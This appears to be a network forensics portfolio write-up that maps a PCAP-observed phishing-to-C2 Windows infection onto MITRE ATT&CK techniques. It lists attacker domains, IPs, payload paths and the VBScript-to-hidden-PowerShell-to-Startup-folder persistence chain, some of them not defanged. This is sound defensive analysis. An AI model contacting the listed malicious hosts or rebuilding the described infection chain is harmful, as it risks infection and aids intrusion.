Back to Writeups
Network Forensics Case Study

MITRE ATT&CK Mapping of PCAP Analysis (Phishing → C2)

January 2026 Wireshark, PCAP, MITRE ATT&CK
Wireshark PCAP Analysis MITRE ATT&CK Phishing Malware Traffic

Overview

This page focuses on the MITRE ATT&CK mapping derived from a Wireshark PCAP investigation of a Windows host infection. The mapping below includes only techniques supported by network-visible evidence (TLS SNI, HTTP streams, and observed connections).

For the full step-by-step traffic analysis (how the infected host was identified, how the staging server was confirmed, and how secondary C2 endpoints were validated), please refer to the detailed write-up in my GitHub repository.

Key Findings (Summary)

  • Infected host: 10.1.17.215 (Windows client)
  • Phishing domain: google-authenticator.burleson-appliance[.]net (confirmed via TLS SNI)
  • Staging / primary control server: 5.252.153[.]241 (VBScript + PowerShell + PE download over HTTP)
  • Secondary C2 endpoints: 45.125.66[.]32:2917 and 45.125.66[.]252:443 (post-infection TLS connections)

Note: This page intentionally keeps the findings brief. The full evidence trail, filters, and packet-level validation are documented in the GitHub write-up.

MITRE ATT&CK Mapping (Evidence-Based)

Scope: This mapping includes only techniques directly supported by network traffic and script contents observed in the PCAP.

  • Initial Access
    • T1566.002 – Phishing: Spearphishing Link
      Evidence: TLS Client Hello SNI to google-authenticator.burleson-appliance.net
      Reasoning: Victim accessed a phishing domain impersonating Google Authenticator over HTTPS.
  • Execution
    • T1059.005 – Command and Scripting Interpreter: Visual Basic
      Evidence: HTTP-delivered VBScript (/api/file/get-file/264872) from 5.252.153[.]241
      Reasoning: VBScript was used as the initial execution stage.
    • T1059.001 – Command and Scripting Interpreter: PowerShell
      Evidence: PowerShell launched with -WindowStyle Hidden; second-stage script retrieved from /api/file/get-file/29842.ps1
      Reasoning: PowerShell execution and script retrieval are visible in HTTP streams.
  • Defense Evasion
    • T1027 – Obfuscated/Compressed Files and Information
      Evidence: Obfuscated PowerShell content with encoded strings observed in delivered script
      Reasoning: Obfuscation is visible in the retrieved payload.
    • T1564.003 – Hide Artifacts: Hidden Window
      Evidence: PowerShell launched using -WindowStyle Hidden
      Reasoning: Execution intentionally hidden from the user.
  • Persistence
    • T1547.001 – Boot or Logon Autostart Execution: Startup Folder
      Evidence: Script creates TeamViewer.lnk pointing to C:\ProgramData\huo\TeamViewer.exe
      Reasoning: Persistence mechanism is explicitly defined in the script retrieved over HTTP.
  • Command and Control
    • T1105 – Ingress Tool Transfer
      Evidence: Network delivery of VBScript, PowerShell, and PE executable (PE confirmed by MZ header)
      Reasoning: Payloads and tools were transferred directly over HTTP from attacker infrastructure.
    • T1071.001 – Application Layer Protocol: Web Protocols
      Evidence: HTTP for staging/payload delivery; HTTPS/TLS for post-infection communication
      Reasoning: Web protocols were used across multiple stages of the infection chain.
    • T1573.002 – Encrypted Channel: TLS
      Evidence: Repeated TLS sessions to 45.125.66.32:2917 and 45.125.66.252:443
      Reasoning: Encrypted outbound communication consistent with secondary C2 behavior.

Takeaway

This mapping shows how MITRE ATT&CK techniques can be supported using network evidence alone. For the complete packet-by-packet proof (filters, HTTP streams, and the reasoning used to confirm the secondary C2 endpoints), see the full write-up in the GitHub repository linked below.

Additional Resources

View Full PCAP Analysis on GitHub

Detailed Wireshark workflow, evidence screenshots, filters, infection chain, and C2 validation
Back to All Writeups